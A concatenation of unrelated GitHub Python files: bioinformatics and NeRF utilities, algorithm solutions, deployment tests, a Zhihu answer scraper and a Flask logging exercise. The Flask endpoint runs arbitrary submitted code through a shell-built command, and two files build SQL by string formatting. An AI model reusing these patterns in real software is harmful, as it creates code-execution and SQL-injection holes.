def __init__(self, word, vowel_list = korean_vowel):
self.word = word
self.vowel, self.liquid = False, False
self._build(vowel_list)
@cached_property
def jongsung(self):
return j2hcj(h2j(self.word[-1]))[-1]
def _build(self, vowel_list):
if self.jongsung in vowel_list:
self.vowel, self.liquid = True, True
elif self.jongsung == 'ㄹ':
self.liquid = True
| storidient/Act2Emo_baseline | utils.py | utils.py | py | 1,684 | python | en | code | 0 | github-code | 13 |
41604769366 | #-*- coding: utf-8 -*-
import csv
import gzip
import time
from jinja2 import Environment, FileSystemLoader
from libs import *
from config import *
class Data(dict):
def __getattr__(self, name):
try:
return self[name]
except KeyError:
raise AttributeError(name)
def __setattr__(self, name, val):
self[name] = val
def abundant_motifs(rows):
res = [rows[0]]
rows = rows[1:]
indexes = []
mlen = 0
for idx, row in enumerate(rows):
if len(row[0]) > mlen:
indexes.append(idx)
mlen = len(row[0])
indexes.append(len(rows))
for i in range(len(indexes)-1):
tmp = sorted(rows[indexes[i]:indexes[i+1]], key=lambda x: (x[0], -x[1]))
res.extend(tmp[:5])
return res
def time_format(dt):
if dt is None:
return ''
else:
return time.strftime('%Y-%m-%d %H:%M:%S', time.localtime(dt))
def used_format(dt):
if dt == 0:
return "0s"
hours = int(dt/3600)
divisor_for_minutes = dt % 3600
minutes = int(divisor_for_minutes/60)
divisor_for_seconds = divisor_for_minutes % 60
seconds = int(divisor_for_seconds)
res = []
if hours:
res.append("%sh" % hours)
if minutes:
res.append("%smin" % minutes)
if seconds:
res.append("%ss" % seconds)
return " ".join(res)
env = Environment(loader=FileSystemLoader(TEMPLATE_DIR))
env.filters['time_format'] = time_format
env.filters['used_format'] = used_format
env.filters['abundant_motifs'] = abundant_motifs
def template_render(template_name, **kwargs):
template = env.get_template(template_name)
return template.render(**kwargs)
def format_to_gff(feature, row):
cols = [row.sequence, 'Krait', feature, row.start, row.end, '.', '+', '.', []]
cols[-1].append("ID={}{}".format(feature, row.id))
cols[-1].append("Motif={}".format(row.motif))
for k in row.getKeys():
if k not in ['id', 'sequence', 'start', 'end', 'motif']:
cols[-1].append("{}={}".format(k.capitalize(), row.value(k)))
cols[-1] = ";".join(cols[-1])
return cols
def write_to_gtf(gtf_file, feature, cursor):
with open(gtf_file, 'w') as gtf:
gtf.write("#!gtf-version 2\n")
gtf.write("#!generated by Krait %s\n" % VERSION)
for row in cursor:
cols = [row.sequence, 'Krait', feature, row.start, row.end, '.', '+', '.', []]
cols[-1].append('gene_id "%s%s"' % (feature, row.id))
cols[-1].append('transcript_id "%s%s"' % (feature, row.id))
cols[-1].append('motif "%s"' % row.motif)
for k in row.getKeys():
if k not in ['id', 'sequence', 'start', 'end', 'motif']:
cols[-1].append('%s "%s"' % (k, row.value(k)))
cols[-1] = "; ".join(cols[-1])
gtf.write("\t".join(map(str, cols))+'\n')
def format_sql_where(conditions):
symbols = ['>=', '<=', '>', '<', '=', ' in ']
conditions = conditions.split()
for idx, cond in enumerate(conditions):
if cond == 'in':
items = conditions[idx+1].strip('()').split(',')
if not items[0].isdigit():
conditions[idx+1] = "(%s)" % ",".join(map(lambda x: "'%s'" % x, items))
continue
if cond in symbols:
if not conditions[idx+1].isdigit():
conditions[idx+1] = "'%s'" % conditions[idx+1]
continue
for symbol in symbols:
if symbol in cond:
res = cond.split(symbol)
if not res[1].isdigit():
res[1] = "'%s'" % res[1]
conditions[idx] = "%s%s%s" % (res[0], symbol, res[1])
return " ".join(conditions)
def format_fasta_sequence(sequence, length):
seqs = []
for idx, base in enumerate(sequence):
seqs.append(base)
if (idx+1) % length == 0:
seqs.append('\n')
seqs.append('\n')
return "".join(seqs)
'''
def gff_gtf_parser(annot_file, _format='GFF'):
"""
parse GFF, GTF, comparessed gz annotation file
"""
if annot_file.endswith('.gz'):
fh = gzip.open(annot_file, 'rt')
else:
fh = open(annot_file)
for line in fh:
if line[0] == '#': continue
cols = line.strip().split('\t')
record = Data(
seqid = cols[0],
feature = cols[2].upper(),
start = int(cols[3]),
end = int(cols[4]),
attrs = Data()
)
for item in cols[-1].split(';'):
if not item:
continue
if _format == 'GFF':
name, value = item.split('=')
else:
name, value = item.strip().strip('"').split('"')
record.attrs[name.strip()] = value
yield record
fh.close()
def get_gtf_coordinate(gtf_file):
father = None
exons = []
for r in gff_gtf_parser(gtf_file, 'GTF'):
try:
gene_name = r.attrs.gene_name
except AttributeError:
gene_name = r.attrs.gene_id
meta = Data(
feature = r.feature,
gene_id = r.attrs.gene_id,
gene_name = gene_name,
)
if r.feature == 'CDS':
yield (r.seqid, r.start, r.end, meta)
elif r.feature == 'FIVE_PRIME_UTR':
meta.feature = '5UTR'
yield (r.seqid, r.start, r.end, meta)
elif r.feature == 'THREE_PRIME_UTR':
meta.feature = '3UTR'
yield (r.seqid, r.start, r.end, meta)
elif r.feature == 'UTR':
yield (r.seqid, r.start, r.end, meta)
elif r.feature == 'EXON':
meta.feature = 'exon'
mother = r.attrs.transcript_id
if father == mother:
exons.append((r.seqid, r.start, r.end, meta))
else:
if exons:
exons = sorted(exons, key=lambda x: x[1])
intron_chrom = exons[0][0]
intron_meta = exons[0][3]
intron_meta.feature = 'intron'
for idx, exon in enumerate(exons):
yield exon
if idx < len(exons)-1:
start = exon[2] + 1
end = exons[idx+1][1] - 1
yield (intron_chrom, start, end, intron_meta)
exons = [(r.seqid, r.start, r.end, meta)]
father = mother
if exons:
exons = sorted(exons, key=lambda x: x[1])
intron_chrom = exons[0][0]
intron_meta = exons[0][3]
intron_meta.feature = 'intron'
for idx, exon in enumerate(exons):
yield exon
if idx < len(exons)-1:
start = exon[2] + 1
end = exons[idx+1][1] - 1
yield (intron_chrom, start, end, intron_meta)
def get_gff_coordinate(gff_file):
father = None
exons = []
parents = {}
for r in gff_gtf_parser(gff_file, 'GFF'):
if r.feature == 'REGION':
continue
elif r.feature == 'GENE':
if 'ID' in r.attrs:
parents[r.attrs.ID] = r.attrs.ID
elif 'GENE' in r.attrs:
parents[r.attrs.GENE] = r.attrs.GENE
parents['gene-{}'.format(r.attrs.GENE)] = r.attrs.GENE
elif 'NAME' in r.attrs:
parents[r.attrs.NAME] = r.attrs.NAME
elif r.feature == 'CDS':
meta = Data(
feature = r.feature,
gene_id = parents[r.attrs.Parent].attrs.ID,
gene_name = parents[r.attrs.Parent].attrs.Name,
)
yield (r.seqid, r.start, r.end, meta)
elif r.feature == 'FIVE_PRIME_UTR':
meta = Data(
feature = '5UTR',
gene_id = parents[r.attrs.Parent].attrs.ID,
gene_name = parents[r.attrs.Parent].attrs.Name,
)
yield (r.seqid, r.start, r.end, meta)
elif r.feature == 'THREE_PRIME_UTR':
meta = Data(
feature = '3UTR',
gene_id = parents[r.attrs.Parent].attrs.ID,
gene_name = parents[r.attrs.Parent].attrs.Name,
)
yield (r.seqid, r.start, r.end, meta)
elif r.feature == 'UTR':
meta = Data(
feature = 'UTR',
gene_id = parents[r.attrs.Parent].attrs.ID,
gene_name = parents[r.attrs.Parent].attrs.Name,
)
yield (r.seqid, r.start, r.end, meta)
elif r.feature == 'EXON':
try:
mother = r.attrs.Parent
except AttributeError:
continue
meta = Data(
feature = 'exon',
gene_id = parents[r.attrs.Parent].attrs.ID,
gene_name = parents[r.attrs.Parent].attrs.Name,
)
if father == mother:
exons.append((r.seqid, r.start, r.end, meta))
else:
if exons:
exons = sorted(exons, key=lambda x: x[2])
intron_chrom = exons[0][0]
intron_meta = exons[0][3]
intron_meta.feature = 'intron'
for idx, exon in enumerate(exons):
yield exon
if idx < len(exons)-1:
start = exon[2] + 1
end = exons[idx+1][1] - 1
yield (intron_chrom, start, end, intron_meta)
exons = [(r.seqid, r.start, r.end, meta)]
father = mother
else:
if 'ID' in r.attrs:
try:
parents[r.attrs.ID] = parents[r.attrs.Parent]
except:
parents[r.attrs.ID] = r.attrs.ID
exons = sorted(exons, key=lambda x: x[2])
intron_chrom = exons[0][0]
intron_meta = exons[0][3]
intron_meta.feature = 'intron'
for idx, exon in enumerate(exons):
yield exon
if idx < len(exons)-1:
start = exon[2] + 1
end = exons[idx+1][1] - 1
yield (intron_chrom, start, end, intron_meta)
'''
def get_ssr_sequence(seq_file, seq_name, start, stop, flank):
'''
Get the SSR sequence and flanking sequences
@para seq_file, the file path of the fasta sequence
@para seq_name, the name of the fasta sequence
@para start, the start position of SSR
@para stop, the stop position of SSR
@para flank, the length of the flanking sequence
@return ssr sequence with flanking sequences
'''
fastas = fasta.Fasta(seq_file, sequence_always_upper=True)
#get ssr sequence
ssr = fastas[seq_name][start-1:stop].seq
#get left flanking sequence
left_flank_start = start - flank - 1
if left_flank_start < 0:
left_flank_start = 0
left_flank = fastas[seq_name][left_flank_start:start]
seq_len = len(fastas[seq_name])
#get right flanking sequence
right_flank_stop = stop + flank
if right_flank_stop > seq_len:
right_flank_stop = seq_len
right_flank = fastas[seq_name][stop:right_flank_stop]
highlighter = SequenceHighlighter()
meta = '%s:%s-%s %s' % (seq_name, left_flank_start+1, start, len(left_flank))
highlighter.format_flank(left_flank, meta)
highlighter.format_ssr(ssr)
highlighter.format_flank(right_flank)
return highlighter.render()
def human_size(size):
if size < 1000:
return '%s B' % round(size, 2)
size = size/1024
if size < 1000:
return '%s KB' % round(size, 2)
size = size/1024
return '%s MB' % round(size, 2)
| lmdu/krait | src/utils.py | utils.py | py | 9,659 | python | en | code | 34 | github-code | 13 |
8343869036 | n = int(input())
arr = []
for i in range(1, n+1):
st = str(int(input()))
cnt = 0
cur = "0"
for j in st:
if j != cur:
cnt += 1
cur = j
print('#%d %d' %(i, cnt)) | rohujin97/Algorithm_Study | swea/Solution_SWEA_1289_원재의메모리복구하기_D3_노유진_161ms.py | Solution_SWEA_1289_원재의메모리복구하기_D3_노유진_161ms.py | py | 211 | python | en | code | 0 | github-code | 13 |
72514154898 | from rpy2deseq.rpy2utils import (
_importr,
_r_to_list,
_r_to_numpy,
_pandas_to_r,
_numpy_to_r
)
import numpy as _np
import pandas as _pd
# Import stats
_stats = _importr('stats')
_hclust_converts = {
'merge': _r_to_numpy,
'height': _r_to_list,
'order': lambda x: _np.array(_r_to_list(x)),
'labels': lambda x: _np.array(_r_to_list(x)),
'method': _r_to_list,
'call': _r_to_list,
'dist.method': _r_to_list
}
def hclust(mat, method="euclidean"):
"""
Call R hclust on a DataFrame or numpy array
:param mat: Data for clustering
:type mat: pd.DataFrame, np.ndarray
:param method: Distance metric, defaults to "euclidean"
:type method: str, optional
:return: Dict of hclust return values converted to
python objects
:rtype: dict
"""
# Convert matrix to an R object
if isinstance(mat, _pd.DataFrame):
rmat = _pandas_to_r(mat, as_matrix=True)
mat_labels = mat.index.tolist()
else:
rmat = _numpy_to_r(mat)
mat_labels = None
# Run hclust
hclust_obj = _stats.hclust(
_stats.dist(rmat, method=method)
)
# Convert returned object to a dict of python objects
hclust_obj = {
k: _hclust_converts[k](v)
for k, v in zip(hclust_obj.names, hclust_obj)
}
# Add labels from dataframe if it was a dataframe
if mat_labels is not None:
hclust_obj['labels'] = mat_labels
return hclust_obj
| GreshamLab/rpy2deseq | rpy2deseq/hclust.py | hclust.py | py | 1,476 | python | en | code | 0 | github-code | 13 |
7100066840 | booked = [ 1, 3, 9, 12, 13, 18, 26, 27, 28, 29 ]
travel = [ 4, 5, 15, 16, 21, 22 ]
study = []
month = range(1, 31)
Busy = booked + travel
for day in month:
if day not in Busy:
study.append(day)
study = [day for day in month if day not in booked + travel]
print(study) | naina-yoganathan/pythonp | days_to_study.py | days_to_study.py | py | 292 | python | en | code | 0 | github-code | 13 |
74229111378 | import os
import googlemaps
from datetime import datetime
from classes import Point
class GoogleMapsHelper:
def __init__(self):
self.client = googlemaps.Client(key=os.environ['GOOGLE_API_KEY'])
def time_between_points(self, origin, destination, unit='hours'):
now = datetime.now()
directions = self.client.directions(origin.coords, destination.coords,
mode="driving", departure_time=now)
if unit == 'hours':
factor = 3600
elif unit == 'minutes':
factor = 60
else:
factor = 1
leg = directions[0]['legs'][0]
try:
return leg['duration']['value'] / factor
except KeyError:
return 0 / factor
| iaacosta/ics3213-g25 | services/GoogleMaps.py | GoogleMaps.py | py | 777 | python | en | code | 0 | github-code | 13 |
11874553115 | from rest_framework import serializers
from order.models import Order
from scan.models import ScanTable, ScanDetailsTable
class ScanTableSerializer(serializers.Serializer):
order_id = serializers.IntegerField()
title = serializers.CharField()
scanImageRaw = serializers.ImageField(allow_null=True, allow_empty_file=True, required=False)
scanImageUrl = serializers.CharField(allow_blank=True, required=False)
def save(self, **kwargs):
try:
scan = ScanTable.objects.get(order_id=self.validated_data['order_id'])
except:
scan = ScanTable()
order = Order.objects.get(id=self.validated_data['order_id'])
scan.order = order
scan.title = self.validated_data['title']
if 'scanImageUrl' in self.validated_data and self.validated_data['scanImageUrl'] != '':
scan.scanImageUrl = self.validated_data['scanImageUrl']
scan.scanImageRaw = None
else:
scan.scanImageUrl = None
scan.scanImageRaw = self.validated_data['scanImageRaw']
scan.save()
return scan
class ScanDetailsTableSerializer(serializers.Serializer):
scan_id = serializers.IntegerField()
title = serializers.CharField()
scanDetailImageRaw = serializers.ImageField(allow_null=True, allow_empty_file=True, required=False)
scanDetailImageUrl = serializers.CharField(allow_blank=True, required=False)
def save(self, **kwargs):
scanDetail = ScanDetailsTable()
scan = ScanTable.objects.get(id=self.validated_data['scan_id'])
scanDetail.scan = scan
scanDetail.title = self.validated_data['title']
if 'scanDetailImageUrl' in self.validated_data and self.validated_data['scanDetailImageUrl'] != '':
scanDetail.scanDetailImageUrl = self.validated_data['scanDetailImageUrl']
scanDetail.scanDetailImageRaw = None
else:
scanDetail.scanDetailImageUrl = None
scanDetail.scanDetailImageRaw = self.validated_data['scanDetailImageRaw']
scanDetail.save()
return scanDetail
| prettypanda0720-ww/Interior-Room-Design-Website-Django-and-React | scan/serializers.py | serializers.py | py | 2,104 | python | en | code | 0 | github-code | 13 |
40724859601 | #!/usr/bin/env python3
"""TLG NDE Python | LAncheta | Lists, Input, Print, Variables"""
def main():
wordbank= ["indentation", "spaces"]
wordbank_append(4)
print(wordbank)
tlgstudents= ["Aaron", "Andy", "Asif",
"Brent", "Cedric", "Chris",
"Cory", "Ebrima", "Franco",
"Greg", "Hoon", "Joey",
"Jordan", "JC", "LB",
"Mabel", "Shon", "Pat", "Zach"]
main()
| GaiusOctopus/mycode | challenge/listchallenge01.py | listchallenge01.py | py | 467 | python | en | code | 0 | github-code | 13 |
31267040182 | import os
from utils import euler_lib
def main():
t = []
supplemental_dir = os.path.join(
os.path.dirname(os.path.dirname(os.path.realpath(__file__))),
"supplemental")
filepath = os.path.join(supplemental_dir, "p67_triangle.txt")
with open(filepath, encoding='utf-8') as f:
t_lines = f.readlines()
for line in t_lines:
t.append(line.split())
# convert everything to ints for euler_lib max path math
t = get_int_grid(t)
return euler_lib.get_triangle_max_path_sum(t)
def get_int_grid(t):
tmp = []
for line in t:
tmp.append(list(map(int, line)))
return tmp
if __name__ == "__main__":
print(main())
| stephendwillson/ProjectEuler | solutions/python/problem_67.py | problem_67.py | py | 706 | python | en | code | 0 | github-code | 13 |
40678801529 | # -*- coding: utf-8 -*-
"""AnyPyTools library."""
import sys
import platform
import logging
from anypytools.abcutils import AnyPyProcess, execute_anybodycon
from anypytools.macroutils import AnyMacro
from anypytools import macro_commands
logger = logging.getLogger('abt.anypytools')
logger.addHandler(logging.NullHandler())
__all__ = [
'datautils', 'h5py_wrapper', 'AnyPyProcess', 'AnyMacro', 'macro_commands',
'print_versions', 'execute_anybodycon',
]
__version__ = '0.10.10'
def print_versions():
"""Print all the versions of software that AnyPyTools relies on."""
import numpy as np
import scipy as sp
print("-=" * 38)
print("AnyPyTools version: %s" % __version__)
print("NumPy version: %s" % np.__version__)
print("SciPy version: %s" % sp.__version__)
print("Python version: %s" % sys.version)
(sysname, nodename, release, version, machine, processor) = \
platform.uname()
print("Platform: %s-%s-%s (%s)" % (sysname, release, machine, version))
if sysname == "Linux":
print("Linux dist: %s" % " ".join(platform.linux_distribution()[:-1]))
if not processor:
processor = "not recognized"
print("Processor: %s" % processor)
print("Byte-ordering: %s" % sys.byteorder)
print("-=" * 38)
| sebastianskejoe/AnyPyTools | anypytools/__init__.py | __init__.py | py | 1,286 | python | en | code | null | github-code | 13 |
24150317194 | """
Ещё раз рассмотрим Flask endpoint, принимающий код на питоне и исполняющий его.
1. Напишите для него Flask error handler,
который будет перехватывать OSError и писать в log файл exec.log
соответствую ошибку с помощью logger.exception
2. Добавьте отдельный exception handler
3. Сделайте так, что в случае непустого stderr (в программе произошла ошибка)
мы писали лог сообщение с помощью logger.error
4. Добавьте необходимые debug сообщения
5. Инициализируйте basicConfig для записи логов в stdout с указанием времени
"""
import logging
import shlex
import subprocess
from typing import Optional
from flask import Flask
from flask_wtf import FlaskForm
from wtforms import IntegerField, StringField
from wtforms.validators import InputRequired
logger = logging.getLogger("exec")
app = Flask(__name__)
class CodeForm(FlaskForm):
code = StringField(validators=[InputRequired()])
timeout = IntegerField(default=10)
def run_python_code_in_subprocess(code: str, timeout: int) -> str:
command = f'python3 -c "{code}"'
command = shlex.split(command)
process = subprocess.Popen(
command,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
)
logger.debug("run cdm")
outs, errs = process.communicate(timeout=timeout)
logger.debug(f"End {process.pid} , exit code {process.returncode}")
if process.returncode > 0:
logger.error(f"{errs.decode(encoding='utf-8')}")
else:
logger.debug(f"{outs.decode(encoding='utf-8')}")
return outs.decode()
@app.route("/run_code", methods=["POST"])
def run_code():
form = CodeForm()
if form.validate_on_submit():
logger.debug("form is valid")
code = form.code.data
timeout = form.timeout.data
stdout = run_python_code_in_subprocess(code=code, timeout=timeout)
return f"Stdout: {stdout}"
logger.debug("Form is not valid")
return f"Bad request. Error = {form.errors}", 400
@app.errorhandler(OSError)
def handle_exception(e: OSError):
original: Optional[Exception] = getattr(e, "original_exception", None)
if isinstance(original, OSError):
logger.exception(f"{e}")
if __name__ == "__main__":
logging.basicConfig(level=logging.DEBUG, filename="exec.log", format='%(asctime)s %(message)s')
app.config["WTF_CSRF_ENABLED"] = False
logger.debug("Start")
app.run(debug=True)
| ilnrzakirov/Python_advanced | module_06_debugging_begin/hw/hw_2_execute_code_from_form.py | hw_2_execute_code_from_form.py | py | 2,703 | python | ru | code | 0 | github-code | 13 |
24147646024 | def fibonachi(num_pos, chek=2, start=0, res=1):
# , Предлагаю упростить решение.
# Нужен только 1 параметр функции =)
# Нам необходимо просто вернуть сумму чисел предыдущего числа и предпредыдущего =)
if num_pos == 1: # , если 2, тоже необходимо выйти из рекурсии
return 1
if chek == num_pos:
return res + start
chek += 1
result = res + start
start = res
return fibonachi(num_pos, chek, start, result)
def fibonachi2(num_pos):
if num_pos == 1 or num_pos == 2:
return 1
result = fibonachi2(num_pos - 2) + fibonachi2(num_pos - 1)
return result
num_pos = int(input("Введите номер позиции: "))
print(fibonachi2(num_pos))
# зачёт!
| ilnrzakirov/Python_basic | Module21/03_fibonacci/main.py | main.py | py | 883 | python | ru | code | 0 | github-code | 13 |
10310267190 | # --*-- coding:utf-8 --*--
# @Time : 2020/12/8 14:52
# @Author : 啊。懋勋
# @version: Python 3.7
# @File : zhihu_question.py
from selenium import webdriver
import time
from lxml import etree
import pymysql
import os
conn = pymysql.connect('localhost', 'root', 'root', 'zhuhu_question') # 连接数据库
cursor = conn.cursor() # 获取游标
driver = webdriver.Chrome()
driver.get('https://www.zhihu.com/question/294701927/answer/1615170394')
driver.find_element_by_xpath("//button[@class='Button Modal-closeButton Button--plain']").click()
try:
driver.find_element_by_xpath("//a[@class='QuestionMainAction ViewAll-QuestionMainAction']").click()
except:
pass
driver.execute_script("window.scrollTo(0, document.body.scrollHeight)")
time.sleep(2)
for i in range(0, 200000, 1500):
driver.execute_script('window.scrollBy(0, {})'.format(i))
# try:
# driver.find_element_by_xpath('//a[@class="QuestionMainAction ViewAll-QuestionMainAction"]').click()
# except:
# pass
# driver.execute_script('window.scrollBy(0, {})'.format(-(i-1000)))
time.sleep(2)
html = etree.HTML(driver.page_source)
contents = html.xpath('//div[@class="List-item"]')
driver.quit()
for i in contents:
try:
author_name = i.xpath('.//a[@class="UserLink-link"]/text()')[0]
except:
author_name = i.xpath('.//span[@class="UserLink AuthorInfo-name"]/text()')[0]
content = i.xpath('.//span[@itemprop="text"]//text()')
content = '\n'.join(content)
sql = "INSERT INTO 你觉得大学期间最恶心的事是什么 values('{}','{}')".format(author_name, content)
try:
cursor.execute(sql)
conn.commit()
except:
continue
print("作者:"+author_name+':')
cursor.close()
conn.close() # 关闭数据库连接 | sing-zzj/pycharm | zhihu_question.py | zhihu_question.py | py | 1,800 | python | en | code | 0 | github-code | 13 |
21731197412 | import tempfile
import unittest
from unittest.mock import call, patch
from deploy.config import new_config
from deploy.deploy_updated_job import create_job_from_savepoint
from deploy.deploy_updated_job import stop_job, update_existing_job
# Creates a Dict in a similar form as we'd expect from Flink's REST API.
def job_dict(id, name, state, start_time):
return {
"jid": id,
"name": name,
"state": state,
"start-time": start_time,
}
def get_test_config():
return new_config({
"namespace": "ns",
"job_name": "log-user",
"sub_job_type": "RAW_LOG_USER",
"new": True,
})
class UpdateExistingJobTest(unittest.TestCase):
# Mock the print so our tests are not printing lines of code.
@patch('builtins.print')
@patch('deploy.deploy_updated_job.create_job_from_savepoint')
@patch('deploy.deploy_updated_job.stop_job')
def test_success(self, mock_stop_job, mock_create_job_from_savepoint, mock_print):
s3_savepoint_path = "s3a://example/path"
mock_stop_job.return_value = s3_savepoint_path
stream_job_config_path = "~/some/k8/config.yaml"
config = get_test_config()
config = config._replace(new=False, stream_job_file=stream_job_config_path)
self.assertEqual(
update_existing_job(job_dict("10", "log-user", "RUNNING", 1000), config),
s3_savepoint_path)
self.assertEqual(mock_stop_job.call_count, 1)
mock_stop_job.assert_has_calls([call("ns", "10", False)])
self.assertEqual(mock_create_job_from_savepoint.call_count, 1)
copy_config = config._replace(start_from_savepoint="s3a://example/path")
mock_create_job_from_savepoint.assert_has_calls([
call("10", copy_config)
])
class StopJobTest(unittest.TestCase):
@patch('builtins.print')
@patch('deploy.deploy_updated_job.wait_for_savepoint')
@patch('deploy.deploy_updated_job.async_stop_job')
def test_success(self, mock_async_stop_job, mock_wait_for_savepoint, mock_print):
mock_async_stop_job.return_value = 'requestId1'
s3_savepoint_path = "s3a://example/path"
mock_wait_for_savepoint.return_value = s3_savepoint_path
self.assertEqual(stop_job("ns", "jobId1", False), s3_savepoint_path)
mock_async_stop_job.assert_has_calls([
call("ns", "jobId1", False)
])
mock_wait_for_savepoint.assert_has_calls([
call("ns", "jobId1", "requestId1")
])
@patch('builtins.print')
@patch('deploy.deploy_updated_job.wait_for_savepoint')
@patch('deploy.deploy_updated_job.async_stop_job')
def test_dry_run(self, mock_async_stop_job, mock_wait_for_savepoint, mock_print):
mock_async_stop_job.return_value = 'requestId1'
self.assertEqual(stop_job("ns", "jobId1", True), "s3://fake-path/for/dry/run")
mock_async_stop_job.assert_has_calls([
call("ns", "jobId1", True)
])
mock_wait_for_savepoint.assert_not_called()
class CreateJobFromSavepointTest(unittest.TestCase):
# Mock the print so our tests are not printing lines of code.
@patch('builtins.print')
@patch('deploy.deploy_updated_job.wait_for_flink_job')
@patch('deploy.deploy_updated_job.subprocess_kubernetes_delete_then_apply')
@patch('deploy.deploy_updated_job.create_modified_kubernetes_config')
def test_success(self,
mock_create_modified_kubernetes_config,
mock_subprocess_kubernetes_delete_then_apply,
mock_wait_for_flink_job,
mock_print):
original_fp = tempfile.NamedTemporaryFile(delete=False)
with open(original_fp.name, 'w') as f:
f.write("original")
new_fp = tempfile.NamedTemporaryFile(delete=False)
with open(new_fp.name, 'w') as f:
f.write("new")
config = get_test_config()
config = config._replace(stream_job_file=original_fp.name, start_from_savepoint="s3a://example/path")
mock_create_modified_kubernetes_config.return_value = new_fp.name
create_job_from_savepoint("jobId1", config)
self.assertEqual(mock_create_modified_kubernetes_config.call_count, 1)
mock_create_modified_kubernetes_config.assert_has_calls([call(config)])
self.assertEqual(mock_subprocess_kubernetes_delete_then_apply.call_count, 1)
mock_subprocess_kubernetes_delete_then_apply.assert_has_calls([call("ns", new_fp.name, False)])
self.assertEqual(mock_wait_for_flink_job.call_count, 1)
mock_wait_for_flink_job.assert_has_calls([call("ns", "log-user", "jobId1", False)])
| promotedai/openmetrics | pipeline/scripts/tests/deploy/test_deploy_updated_job.py | test_deploy_updated_job.py | py | 4,694 | python | en | code | 5 | github-code | 13 |
74080596176 | from pathlib import Path
from PIL import Image
import numpy as np
# Search for pyNeRFRenderCore in build/Debug/
import sys
path_to_PyTurboNeRF = Path(__file__).parent.parent / "build" / "Debug"
print("Searching for TurboNeRF in", path_to_PyTurboNeRF)
sys.path.append(str(path_to_PyTurboNeRF))
import PyTurboNeRF as tn # type: ignore
# check if TurboNeRF is loaded
print("TurboNeRF loaded:", tn is not None)
# initialize all the things
manager = tn.NeRFManager()
renderer = tn.Renderer(pattern=tn.RenderPattern.LinearChunks)
LAYER_N = 3
def posix_to_win(path):
win_path_1 = Path(path).as_posix().replace("/", "\\")
#replace first part with drive letter
win_path_2 = win_path_1.replace("\\e\\", "E:\\", 1)
return win_path_2
# big-brain-mala-up-high/ double-antler-cones/ lumpy-short/ short-chandelier-on-spiny-bed/ tall-single-chandelier/ tiny-yellow-on-slab/
# crown-of-thorns/ lumpy-rocky-tall-parker-bg/ lumpy-solo/ red-urchin-thick-spines/ stalagmite-lumpy/ thick-wide-chandelier-on-rocks/ tiny-yellow-up-high/
#
nerf_names = [
"big-brain-mala-up-high",
"double-antler-cones",
"lumpy-short",
"short-chandelier-on-spiny-bed",
"tall-single-chandelier",
"tiny-yellow-on-slab",
"crown-of-thorns",
"lumpy-rocky-tall-parker-bg",
"lumpy-solo",
"red-urchin-thick-spines",
"stalagmite-lumpy",
"thick-wide-chandelier-on-rocks",
"tiny-yellow-up-high"
]
# alphabetize
nerf_names.sort()
# get CUDA_VISIBLE_DEVICES
import os
id = os.environ["CUDA_VISIBLE_DEVICES"]
# split into 4 equal parts
nerf_names = np.array_split(nerf_names, 4)[int(id)]
# prepend /e/nerfs/coral
nerf_names = [f"/e/nerfs/coral/{name}" for name in nerf_names]
# convert to windows path
nerf_names = [posix_to_win(name) for name in nerf_names]
# get index from args
index = int(sys.argv[1])
if index >= len(nerf_names):
print(f"Index {index} is too high, there are only {len(nerf_names)} nerfs")
exit()
base_path = nerf_names[index]
print(f"Working on {base_path}")
# create paths
Path(f"{base_path}\\test").mkdir(parents=True, exist_ok=True)
Path(f"{base_path}\\snapshots").mkdir(parents=True, exist_ok=True)
dataset = tn.Dataset(f"{base_path}\\video.transforms.json")
dataset.load_transforms()
nerf = manager.create()
nerf.attach_dataset(dataset)
trainer = tn.Trainer(nerf)
# you can use any kind of render buffer you want, but if you want to get access to the rgba data as a np.array, you need to use the CPURenderBuffer
render_buf = tn.CPURenderBuffer()
render_buf.set_size(512, 512)
principal_point = (render_buf.width / 2, render_buf.height / 2)
focal_len = (500, 500)
shift = (0, 0)
# Just pull a random camera from the dataset
cam0 = dataset.cameras[0]
# Create a render camera with the resolution of our render buffer
render_cam = tn.Camera(
(render_buf.width, render_buf.height),
cam0.near,
cam0.far,
focal_len,
principal_point,
shift,
cam0.transform,
cam0.dist_params
)
trainer.setup_data(batch_size=2<<21)
def img_load_status(i, n):
print(f"Loaded image {i} of {n}")
trainer.load_images(on_image_loaded=img_load_status)
for i in range(15000):
print(f"Training step {i}...")
trainer.train_step()
if i % 16 == 0 and i > 0:
trainer.update_occupancy_grid(i)
# render output image
if i % 5000 == 0 and i > 0:
request = tn.RenderRequest(
render_cam,
[nerf],
render_buf,
tn.RenderModifiers(),
tn.RenderFlags.Final
)
renderer.submit(request)
# save
rgba = np.array(render_buf.get_rgba())
rgba_uint8 = (rgba * 255).astype(np.uint8)
img = Image.fromarray(rgba_uint8, mode="RGBA")
img.save(f"{base_path}\\test\\render_{i:05d}.png")
# save snapshot
# if (i + 1) % 5000 == 0 and i > 0:
# tn.FileManager.save(nerf, f"{base_path}\\snapshots\\step-{nerf.training_step}.turbo")
tn.FileManager.save(nerf, f"{base_path}\\snapshots\\step-{nerf.training_step}.turbo")
trainer.teardown()
manager.destroy(nerf)
# it is recommended to call these methods at the end of your program
# render_buf.free()
# tn.teardown()
| JamesPerlman/TurboNeRF | examples/train-all.py | train-all.py | py | 4,235 | python | en | code | 296 | github-code | 13 |
17035737944 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import json
from alipay.aop.api.constant.ParamConstants import *
class AlarmInfo(object):
def __init__(self):
self._ad_code = None
self._content = None
self._level = None
self._out_id = None
self._time = None
self._title = None
self._type = None
@property
def ad_code(self):
return self._ad_code
@ad_code.setter
def ad_code(self, value):
self._ad_code = value
@property
def content(self):
return self._content
@content.setter
def content(self, value):
self._content = value
@property
def level(self):
return self._level
@level.setter
def level(self, value):
self._level = value
@property
def out_id(self):
return self._out_id
@out_id.setter
def out_id(self, value):
self._out_id = value
@property
def time(self):
return self._time
@time.setter
def time(self, value):
self._time = value
@property
def title(self):
return self._title
@title.setter
def title(self, value):
self._title = value
@property
def type(self):
return self._type
@type.setter
def type(self, value):
self._type = value
def to_alipay_dict(self):
params = dict()
if self.ad_code:
if hasattr(self.ad_code, 'to_alipay_dict'):
params['ad_code'] = self.ad_code.to_alipay_dict()
else:
params['ad_code'] = self.ad_code
if self.content:
if hasattr(self.content, 'to_alipay_dict'):
params['content'] = self.content.to_alipay_dict()
else:
params['content'] = self.content
if self.level:
if hasattr(self.level, 'to_alipay_dict'):
params['level'] = self.level.to_alipay_dict()
else:
params['level'] = self.level
if self.out_id:
if hasattr(self.out_id, 'to_alipay_dict'):
params['out_id'] = self.out_id.to_alipay_dict()
else:
